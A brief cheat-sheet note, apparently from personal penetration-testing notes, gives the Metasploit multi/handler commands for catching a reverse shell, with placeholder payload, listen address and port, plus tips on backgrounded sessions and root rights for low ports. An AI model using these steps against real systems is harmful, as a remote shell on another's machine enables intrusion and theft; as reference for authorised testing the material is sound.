# metasploit reverse shell

```use multi/handler```
```sh
set PAYLOAD <payload>
set LHOST   <listen-address>
set LPORT   <liste-port>
exploit -j
```
* multi/handler is backgrounded. Therefore, `session 1` foregrounds the session.

* __LPORT under 1024__ user must be root or use sudo